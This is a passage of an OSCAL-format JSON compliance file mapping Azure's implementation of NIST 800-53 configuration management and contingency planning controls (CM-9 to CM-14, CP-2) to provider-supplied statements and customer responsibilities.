statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4e2b94e0-5f17-4c19-aded-f2187f6fe83f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-059"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.b","by-components":[{"uuid":"eb290678-b842-4469-b1d7-15db06f5297b","export":{"provided":[{"uuid":"1aa9a7f8-7d19-4036-8ac7-1b276813917d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-059"}],"description":"The Azure SOPs define configuration items at the hardware and software levels._x000D_ _x000D_"}],"responsibilities":[{"uuid":"e95f423c-ee64-4351-a6db-a82ec4179cd8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-059"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that establishes a process for identifying configuration items throughout the system development life cycle and for managing the configuration of customer-deployed resources.","provided-uuid":"1aa9a7f8-7d19-4036-8ac7-1b276813917d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a35139f3-49d8-4e74-88fc-6aa61488f3c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-060"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.c","by-components":[{"uuid":"a1e3e2de-2f4e-44ea-8cbe-3574f41dc2c5","export":{"provided":[{"uuid":"f547e99e-431b-48b1-adc4-b06353e9a5bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-060"}],"description":"Azure defines the configuration items for the information system. Azure aligns with Microsoft's Security Development Lifecycle (SDL) process which documents each phase of development that must be followed for all engineering projects. The Azure SOPs cover the change management process around information system design, development, and implementation of changes. When a component of Azure is initiated using the SDL process, it is placed under the Microsoft and Azure configuration management requirements."}],"responsibilities":[{"uuid":"d00d483b-1748-4e9d-b7ce-6b5a8904c55f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-060"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that defines the configuration items for the customer-deployed resources and places the configuration items under configuration management.","provided-uuid":"f547e99e-431b-48b1-adc4-b06353e9a5bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c12bc19e-5467-4bd3-808f-57e7a706fd04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.d","by-components":[{"uuid":"0abc597e-1373-4a72-9bc8-17c4e43c73fd","export":{"provided":[{"uuid":"c0e8433a-0a33-421e-8361-faf43a44d97e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-061"}],"description":"The Azure SOP Review Process Authority reviews and approves Azure SOPs on an annual basis."}],"responsibilities":[{"uuid":"a21379bb-b0f7-4a5e-9ca1-6da1afb3b666","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-061"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and approving the configuration management plan.","provided-uuid":"c0e8433a-0a33-421e-8361-faf43a44d97e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"07a54661-6d2f-4306-ba4d-06ac79fea318","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-9_smt.e","by-components":[{"uuid":"11275fed-958d-42ab-9446-b8573f344903","export":{"provided":[{"uuid":"786c1e21-9a8b-4bc6-aa34-bb8ce37cb790","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-062"}],"description":"The Azure SOPs are stored within the Azure SharePoint site, which has functionality enable to protect against unauthorized disclosure and modification."}],"responsibilities":[{"uuid":"f52667a7-c90b-4fb5-8b30-bcd22b41cb42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-062"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing, documenting, and implementing a configuration management plan that protects the configuration management plan from unauthorized disclosure and modification.","provided-uuid":"786c1e21-9a8b-4bc6-aa34-bb8ce37cb790"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6b889282-0cf1-40bd-8303-677377709954","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-10","statements":[{"uuid":"714481b6-f600-4dd6-8fa2-e7818272691b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-063"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-10_smt.a","by-components":[{"uuid":"0f1fcdfe-7775-4701-a6b8-1f486f4e72c6","export":{"provided":[{"uuid":"5f69dbfa-ebb2-4746-8204-6bc43f5f4acf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-063"}],"description":"The Microsoft Acceptable Use Standard outlines the Online Services specific acceptable usage standards of the Infrastructure & Services technology assets, including criteria including whether roles can make copies of copyrighted software. The Copyright Policy also contains information on how Microsoft respects copyright law._x000D_ _x000D_ In accordance with the Third Party Software Policy, Azure uses software according to contractual agreements. This portion of the corporate policy states the following: Unlike other types of finished goods, software is not owned by end users, but licensed through a contractual agreement which defines the terms and conditions that govern the license grant and restrict the product's use. These terms and conditions may change over time through amendment, renewal, termination, expiration, etc._x000D_ _x000D_"}],"responsibilities":[{"uuid":"32efeec2-7e35-41a0-af4e-679221a72650","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-063"}],"description":"The customer is responsible for using software and associated documentation in accordance with contract agreements and copyright laws.","provided-uuid":"5f69dbfa-ebb2-4746-8204-6bc43f5f4acf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3a481bf3-41ae-4896-bb3a-e8de78b00641","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-064"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-10_smt.b","by-components":[{"uuid":"87ef33cf-8192-46be-a520-2fb63b34c159","export":{"provided":[{"uuid":"c9bc6335-4e6f-4ac5-b5c4-a7779d55202d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-064"}],"description":"The Microsoft Security Policy outlines the software usage restrictions for Azure and requires all Azure applications, including those developed or hosted by and/or purchased from third parties, to undergo a comprehensive security review before entry into the Azure environment. In addition, no software is to be deployed or used in Azure's production environment without formal approval as required by the Microsoft Security Policy._x000D_ _x000D_ In-house software used within the Azure boundary is developed by Microsoft and, therefore, not subject to contractual requirements, copyright restrictions, and licenses monitoring for compliance with third-party relationships._x000D_ _x000D_ In accordance with the Third Party Software Policy, all third-party software must be purchased through a corporate function to enable tracking of all software purchases, compliance with software licensing terms, and corporate risk reduction from exposure to licensing agreements. Microsoft complies with all software usage requirements as defined by the contractual agreement with the vendor._x000D_ _x000D_"}],"responsibilities":[{"uuid":"87f509e9-b793-486a-b1d7-fcd0f6a7c68c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-064"}],"description":"The customer is responsible for tracking the use of software and associated documentation protected by quantity licenses.","provided-uuid":"c9bc6335-4e6f-4ac5-b5c4-a7779d55202d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4473ef55-43e6-4558-b09e-06f5775e0aad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-065"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-10_smt.c","by-components":[{"uuid":"7eca44f7-ab68-411f-bc2b-10faa66eed25","export":{"provided":[{"uuid":"6286d378-f636-4302-b16c-d6567992a049","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-065"}],"description":"Azure configures the information system to provide only essential capabilities and specifically prohibits or restricts the use of functions, ports, protocols, and/or services as per industry best practice guidelines. Any use of peer-to-peer (P2P) networking in the environment is denied by default. If needed, P2P networking would be managed as an exception through the security review process. Furthermore, Azure prohibits the distribution of pirated software in accordance with Microsoft Policy._x000D_ _x000D_"}],"responsibilities":[{"uuid":"31da14c9-9c02-41db-997d-5d8ba7ac3712","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-065"}],"description":"The customer is responsible for controlling and documenting of the use of peer-to-peer (P2P) file sharing technology to prevent unauthorized distribution, display, performance, or reproduction of copyrighted work.","provided-uuid":"6286d378-f636-4302-b16c-d6567992a049"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"7b1cf1d5-b812-47f1-9fcd-9c38673fcbac","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-11","statements":[{"uuid":"3b7eeded-0fc4-4931-8d7e-6bb6b79be57f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-066"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-11_smt.a","by-components":[{"uuid":"08a2011c-b569-42b3-834b-5381f90ed9b3","export":{"provided":[{"uuid":"65115fff-97f5-4499-9b46-e606976da118","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-066"}],"description":"The Microsoft Security Policy outlines the Microsoft user-installed software restrictions for Azure. In accordance with the policy, all software installed in the Azure environment, prior to being released into production, must go through the change management process and be approved by the appropriate stakeholders. The following guidelines are in place regarding the installation of software, including open source software, within the Azure environment:_x000D_ _x000D_ * All software installed within Azure must be approved by the appropriate stakeholders prior to being released into production._x000D_ * Prior to deployment in Azure, all software must be tested in a manner suitable to Microsoft to evaluate its impact on system performance, stability (failure and recovery characteristics) and security state (security controls work as expected and the product does not contain malicious code)._x000D_ * Software submitted for approval must have a legitimate business purpose._x000D_ _x000D_ Additionally, open source software must be evaluated by CELA in accordance with the policies and processes set out in Microsoft's open source software resource website. Requests for evaluation of open source software require approval through the OSS Registration Tool._x000D_ _x000D_"}],"responsibilities":[{"uuid":"dbb2ecf3-9309-4cca-9e4d-4ca335dc9af0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-066"}],"description":"The customer is responsible for establishing a policy governing the installation of software on customer-deployed resources by users.","provided-uuid":"65115fff-97f5-4499-9b46-e606976da118"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"263fea37-28c7-4fdd-ac63-f9c400e3dbbe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-067"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-11_smt.b","by-components":[{"uuid":"425fef38-172d-413f-a5af-f6340b6a6c4e","export":{"provided":[{"uuid":"bb43306c-1ea4-48d1-bab9-870afc6dad52","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-067"}],"description":"Azure enforces software installation policies through configuration control processes and access restrictions for change._x000D_ _x000D_"}],"responsibilities":[{"uuid":"9ce4f29e-8deb-4df9-ac97-9afddaddc2df","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-067"}],"description":"The customer is responsible for enforcing software installation policies.","provided-uuid":"bb43306c-1ea4-48d1-bab9-870afc6dad52"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"05efb18f-cff6-4eda-aebe-9447f13dd7e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-068"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-11_smt.c","by-components":[{"uuid":"c13af72e-1703-493e-8517-f7d3e800a1cc","export":{"provided":[{"uuid":"998ad78e-f2ab-42ef-91f7-2a307847f17e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-068"}],"description":"Azure monitors compliance by reviewing and updating configuration settings and configuration baselines of hardware, software and network devices at least annually. Changes are developed, tested and approved prior to entering the production environment in a development and/or test environment._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fccf6b24-4c5d-4a53-b67b-3bd8c0d2a4a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-068"}],"description":"The customer is responsible for monitoring the compliance of customer-deployed resources with the policies identified in CM-11.a.","provided-uuid":"998ad78e-f2ab-42ef-91f7-2a307847f17e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"25d0d34d-0cf2-4a99-a8c7-eca4ea0fa537","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-12","statements":[{"uuid":"5cbb4643-29bb-4615-8b57-edc4055f8eba","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-069"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12_smt.a","by-components":[{"uuid":"14ed359d-4bfc-4da6-885c-e777ec2110ff","export":{"provided":[{"uuid":"2a8b7e67-4d35-41df-9f97-51dbe061d5f1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-069"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. The physical address locations of Azure datacenters are documented in facility manager tool utilized by datacenter personnel."}],"responsibilities":[{"uuid":"84ea3d2a-cf35-4fba-83ee-29c16f30a27a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-069"}],"description":"The customer is responsible for identifying and documenting the location of system inventory components for customer-deployed resources.","provided-uuid":"2a8b7e67-4d35-41df-9f97-51dbe061d5f1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"627b717a-8646-4af0-b588-5f3efd0d73a4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-070"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12_smt.b","by-components":[{"uuid":"d1fe7fc5-8373-402b-93f5-392f1e018cad","export":{"provided":[{"uuid":"d4f77e7b-51a1-457f-8f8c-32ca733fc818","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-070"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. The physical address locations of Azure datacenters are documented in facility manager tool utilized by datacenter personnel. If changes to the location of the Azure datacenters occur within the United States geographic country, data center personnel will document the occurrence in facility manager tool."}],"responsibilities":[{"uuid":"51f0396d-2b9e-4294-a36a-55ccdb6b909b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-070"}],"description":"The customer is responsible for building out appropriate access control procedures for managing personnel who have access to the inventory system components for customer-deployed resources.","provided-uuid":"d4f77e7b-51a1-457f-8f8c-32ca733fc818"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b24b3113-ebd5-485c-a060-3abd34cae365","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-071"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12_smt.c","by-components":[{"uuid":"5cf397d8-8f52-45e0-a090-a950aa6cd2cd","export":{"provided":[{"uuid":"87c2d93e-b343-4326-ae33-fd21ed8c51f6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-071"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. The physical address locations of Azure datacenters are documented in facility manager tool utilized by datacenter personnel. If changes to the location of the Azure datacenters occur within the United States geographic country, data center personnel will document the occurrence in facility manager tool."}],"responsibilities":[{"uuid":"e16b2238-f927-46fc-b804-24cc26e4d948","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-071"}],"description":"The customer is responsible for managing changes relating to the location of the system inventory components for customer-deployed resources.","provided-uuid":"87c2d93e-b343-4326-ae33-fd21ed8c51f6"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"86a86371-b7ca-44a9-8165-7e2ebcad3479","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-12.1","statements":[{"uuid":"1422ce63-2cb4-4f31-bba1-ed1f1ee6ef0c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-072"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-12.1_smt","by-components":[{"uuid":"566e476a-4790-4423-a2ff-3e50b5a6e937","export":{"provided":[{"uuid":"57d8b810-2750-497c-bbbc-2243ee54a5e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-072"}],"description":"Information system components that make up Azure cloud environments consist of physical digital media hardware and logical software. Both digital media and logical software components of Azure cloud environments are housed in Azure datacenters deployed in United States geographic locations. The physical address locations of Azure datacenters are documented in facility manager tool utilized by datacenter personnel. Physical access to digital media in Azure datacenters is managed by Datacenter Access Tool (DCAT). DCAT contains the authorized access lists of personnel who have been approved by the Datacenter Management (DCM) team. Access to areas within the datacenter is granted based on the least privileged principle. Before a person arrives at a data center, they must have a DCAT request approved by the DCM team. For logical software, privileges to Azure production services and administrative interfaces are assigned to Azure personnel based on the least privilege principles in accordance with job responsibilities. Elevated access must be approved by the respective account managers. OneIdentity aliases, used for access provisioning to resources, are based on structured business resources/rules created by the Azure service teams. They are used to grant Azure personnel access to designated and restricted security groups on least privilege principles. Service teams can obtain Just in Time (JIT) for troubleshooting purposes. JIT is utilized to limit elevated access to a specific duration of time, eliminating the use of persistent elevated access. JIT access is provided though the JIT portal based on the workflow configured and the access is granted only to the requested assets. The access can be configured to support business needs and can range from one (1) hour to seven (24) hours and revoked based on the JIT policy settings prescribed by the resource owner. Break-Glass accounts provide the minimum permissions necessary to execute work if JIT is nonfunctioning. Access to Azure services is granted based upon need-to-know and least privileged principles. Access that has not been explicitly permitted is denied by default. Role-based access controls are used to allocate logical access to a specific job function or area of responsibility, rather than to an individual. If changes to the location of the Azure datacenters occur within the United States geographic country, data center personnel will document the occurrence in facility manager tool."}],"responsibilities":[{"uuid":"4c4a82a6-493f-4b49-a258-65f0e41e1938","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-072"}],"description":"The customer is responsible for utilizing automated tools to identify customer-controlled information system components to ensure controls are in place to protect customer information.","provided-uuid":"57d8b810-2750-497c-bbbc-2243ee54a5e5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"eb56ae24-1abb-4110-bf25-5b1fcb211d90","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cm-14","statements":[{"uuid":"2a026d2b-ecf9-4749-95eb-c571256d0296","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-073"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cm-14_smt","by-components":[{"uuid":"2201f210-332e-4314-89bf-0d976df083b7","export":{"provided":[{"uuid":"a28830dd-6331-48c3-98d1-ec1a32cf12bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-073"}],"description":"In accordance with Microsoft Security Program Policy (MSPP), all software installed within Azure must have a valid signature. The Azure System Lockdown (AzSysLock) team uses AzSecPack to monitor for unexpected running software. This is defined as any software that is not signed using the appropriate signing certificates. AzSysLock sends alerts for service teams that are not using signed code. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for unsigned binaries running are created to service owners as a Severity 2 incident in the Incident Management (IcM) system. In the scenario of AzSysLock feature is turned off for Azure services, detections are sent to Azure service and security teams for activation actions."}],"responsibilities":[{"uuid":"db0583d9-5444-4f98-bd08-145dcf2c7f72","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CM-05-073"}],"description":"For IaaS and PaaS assets, the customer is responsible for prevent the installation of organization-defined software and firmware components without verification that the component has been digitally signed using a certificate that is recognized and approved by the organization.","provided-uuid":"a28830dd-6331-48c3-98d1-ec1a32cf12bc"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"d5470912-76fa-4bf4-934c-c7f041557720","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"cp-2","statements":[{"uuid":"bc996330-93f0-474b-8d89-46c6b3ee9a31","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.a","by-components":[{"uuid":"ddfdb49d-f598-492e-8d3f-5ef3f9de6475","export":{"provided":[{"uuid":"0b0846ee-1ed6-4ad8-ae22-f5072db5fc50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-006"}],"description":"The Azure Business Continuity Plan (BCP) and Azure Disaster Recovery Plan (DRP) provide the detailed processes for contingency planning for Azure. They serve as a guide for Azure to respond, recover, and resume operations during a serious adverse event. The BCP covers the actions taken by key personnel, resources, and services required to continue critical business processes and operations. This plan is intended to address extended business disruptions. The development of the DRP follows Azure Business Continuity and Disaster Recovery SOP. The DRP covers the actions taken by key personnel, resources, and services required to continue critical technology processes and operations. This plan is intended to address extended service disruptions. The development of the DRP follows Azure Business Continuity and Disaster Recovery SOP. These plans are followed by all technology services; however, the individual steps for recovery are stored separately by the owning service teams and hyperlinks to each team's plans are provided to the BCM team for verification. The BCP and DRP document all program requirements and standard operating procedures used by all services covering all commonly shared processes. The individual service plans are the details of how a service recovers regardless of outage scope that can be followed by any authorized member of a service team. This allows Azure to eliminate single points of failure and ensures continuity of operations."}],"responsibilities":[{"uuid":"38a8d3c9-fe38-48b5-887a-1119be9942e2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for developing a contingency plan for customer-deployed resources, including essential mission and business functions and associated contingency requirements; recovery objectives, restoration priorities and metrics; contact information for assigned roles/responsibilities/individuals; maintaining essential mission and business functions despite system disruption, compromise or failure; eventual, full system restoration without deterioration of originally implemented security safeguards; and review/approval of the plan by customer-defined personnel/roles. Note: the customer should also include any reliance on Azure functionality to perform these tasks.","provided-uuid":"0b0846ee-1ed6-4ad8-ae22-f5072db5fc50"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c39fe422-593f-4fe3-9a4f-40f060638719","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"cp-2_smt.b","by-components":[{"uuid":"a1c8271d-5ac9-469a-93e5-6131709a64bc","export":{"provided":[{"uuid":"9f33c01a-cf9b-4fdb-bc25-3e7929285d22","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-007"}],"description":"Microsoft distributes the BCP and DRP to all personnel via SharePoint. Service plans are stored on service-team-internal SharePoint sites, Wikis, or OneNote with links to them present in the Business Continuity Disaster Recovery (BCDR) Program section of the Azure Global Portal. Service teams are responsible for distributing service plans."}],"responsibilities":[{"uuid":"ab29524f-855a-404b-bca6-746be14e16c7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CP-06-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for distributing the contingency plans.","provided-uuid":"9f33c01a-cf9b-4fdb-bc25-3e7929285d22"}]},"description":"See inheritance and customer responsibility 